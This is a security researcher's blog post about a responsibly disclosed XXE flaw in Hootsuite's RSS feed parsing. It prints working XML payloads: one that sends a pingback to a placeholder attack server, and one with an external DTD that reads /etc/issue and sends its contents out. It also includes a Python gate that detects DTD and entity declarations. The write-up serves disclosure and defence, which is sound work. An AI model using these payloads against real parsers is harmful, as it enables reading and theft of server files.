Yasin Soliman

I'm Yasin, a security analyst and researcher from the UK. This is my personal blog for sharing technical findings. I also write for Graham Cluley and Tripwire.

From RSS to XXE: feed parsing on Hootsuite


Mike Knoop's research into XXE exploitation inspired me to experiment with RSS parsing on Hootsuite.

XML External Entity (XXE) vulnerabilities arise when an XML parser processes untrusted input that declares an external entity and then resolves the reference, fetching a local file or a remote URL on the submitter's behalf.

Within fifteen minutes of testing, I had gained a pingback and demonstrated an exfiltration of /etc/issue.


Hootsuite is the world's most widely used platform for managing social media. More than 15 million users, including 800+ of the Fortune 1000 companies, trust Hootsuite to manage their social media programs across multiple social networks from one integrated dashboard.

Getting a pingback in production

Using Mike's XML file as a model, I configured an "xxe" SYSTEM entity to deliver a pingback – a simple GET request towards the "attacker" Apache server.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE title [ <!ELEMENT title ANY >
<!ENTITY xxe SYSTEM "http://<AttackIP>/rssXXE" >]>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
    <title>XXE Test Blog</title>
    <link>http://example.com/</link>
    <description>XXE Test Blog</description>
    <lastBuildDate>Mon, 02 Feb 2015 00:00:00 -0000</lastBuildDate>
    <item>
        <title>&xxe;</title>
        <link>http://example.com</link>
        <description>Test Post</description>
        <author>[email protected]</author>
        <pubDate>Mon, 02 Feb 2015 00:00:00 -0000</pubDate>
    </item>
</channel>
</rss>

After checking the Apache access log was ready (with a tail -f stream), I clicked "Save Feed" and waited in anticipation.

One second later, access.log lit up with a pingback – the Hootsuite server was vulnerable to SYSTEM entity exploitation.

Testing with /etc/issue

Transferring notes across my slew of TextEdit screens, I decided to craft a two-part payload to demonstrate exploitability: an RSS file plus an external DTD, which together read the /etc/issue version file and exfiltrate it via my Apache attack server.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE roottag [
<!ENTITY % file SYSTEM "file:///etc/issue">
<!ENTITY % dtd SYSTEM "http://<WebServer>/xxe.dtd">
%dtd;]>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
    <title>&file; &dtd;</title>
    <link>http://example.com/</link>
    <description>&send;</description>
    <lastBuildDate>Mon, 02 Feb 2015 00:00:00 -0000</lastBuildDate>
    <item>
        <title>&file; &dtd;</title>
        <link>http://example.com</link>
        <description>&send;</description>
        <author>[email protected]</author>
        <pubDate>Mon, 02 Feb 2015 00:00:00 -0000</pubDate>
    </item>
</channel>
</rss>

As you can see, line 4 references an external Document Type Definition file ("xxe.dtd"). That DTD declares a "send" entity whose SYSTEM URL embeds the contents of the %file; parameter entity, so resolving &send; delivers /etc/issue to the attack server as a pingback:

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://<AttackIP>/XXE?%file;'>">
%all;

Upon submitting the new XML file to the Dashboard as an RSS feed, Apache lit up with a second pingback: the contents of /etc/issue, exfiltrated straight across to the server.

XXE pingback on Hootsuite in production

Files with longer content, or characters that are not valid inside a URL or an entity value (e.g. & and newlines), would cause the exfiltration to malfunction; /etc/issue is short and single-line, which makes it a safe test case for identifying XML External Entity concerns.
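On the defensive side, both payloads above depend on the parser accepting a DOCTYPE with entity declarations, which an RSS feed never needs. The following is an added example (not Hootsuite's code) showing a Python gate built on the standard-library expat bindings that reports every DTD construct in a submitted feed without fetching anything, and refuses to parse the feed if any is present; the sample feeds are constructed for this example, with http://attacker.example standing in for the <AttackIP> placeholder.

```python
# Added example: gate RSS input before it reaches an XML parser. The scan
# never resolves parameter entities and never fetches external entities, so
# neither xxe.dtd nor /etc/issue is read while checking a hostile feed.
import xml.parsers.expat as expat
import xml.etree.ElementTree as ET


class UnsafeFeed(ValueError):
    """Feed declares a DTD, declares an entity, or references an external entity."""


def check_feed_safety(xml_bytes: bytes) -> list:
    """Return the DTD constructs found in the feed (empty list means clean)."""
    findings = []
    p = expat.ParserCreate()
    # Never expand parameter entities, so the %dtd; reference is skipped, not fetched.
    p.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(name, sysid, pubid, has_internal_subset):
        findings.append(f"DOCTYPE {name} (system id: {sysid})")

    def on_entity_decl(name, is_param, value, base, sysid, pubid, notation):
        kind = "parameter" if is_param else "general"
        findings.append(f"{kind} entity {name} -> {sysid or repr(value)}")

    def on_external_ref(context, base, sysid, pubid):
        findings.append(f"external entity reference to {sysid}")
        return 1  # report it as handled; nothing is fetched and the entity expands to nothing

    p.StartDoctypeDeclHandler = on_doctype
    p.EntityDeclHandler = on_entity_decl
    p.ExternalEntityRefHandler = on_external_ref
    p.Parse(xml_bytes, True)
    return findings


def parse_rss_titles(xml_bytes: bytes) -> list:
    """Parse the feed only if the gate passes; return the <item> titles."""
    findings = check_feed_safety(xml_bytes)
    if findings:
        raise UnsafeFeed("; ".join(findings))
    root = ET.fromstring(xml_bytes)
    return [item.findtext("title") or "" for item in root.iter("item")]


# Constructed samples: a clean feed, and the pingback payload from this post.
SAFE_FEED = b'<rss version="2.0"><channel><title>Blog</title><item><title>Test Post</title></item></channel></rss>'
PINGBACK_FEED = (b'<?xml version="1.0"?><!DOCTYPE title [ <!ELEMENT title ANY >'
                 b'<!ENTITY xxe SYSTEM "http://attacker.example/rssXXE" >]>'
                 b'<rss version="2.0"><channel><item><title>&xxe;</title></item></channel></rss>')
```

In production the same policy is available off the shelf, for example via defusedxml, which rejects DTDs and entity expansion by default; the value of the hand-written gate is that it also logs exactly which construct was attempted.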

At this point, I decided to wrap things up and prepare a summary. Notes collated, I sent an email to [email protected].

Conclusion

This vulnerability was responsibly disclosed to Hootsuite; recognition has been provided on the Security page.

I would like to commend Pablo from Security Operations for handling this report with expedition and professionalism – and the Hootsuite development team for a swift remediation.

Further reading

Research timeline

The following timestamps are provided in GMT.

Public disclosure was requested several weeks after confirmation of the fix:
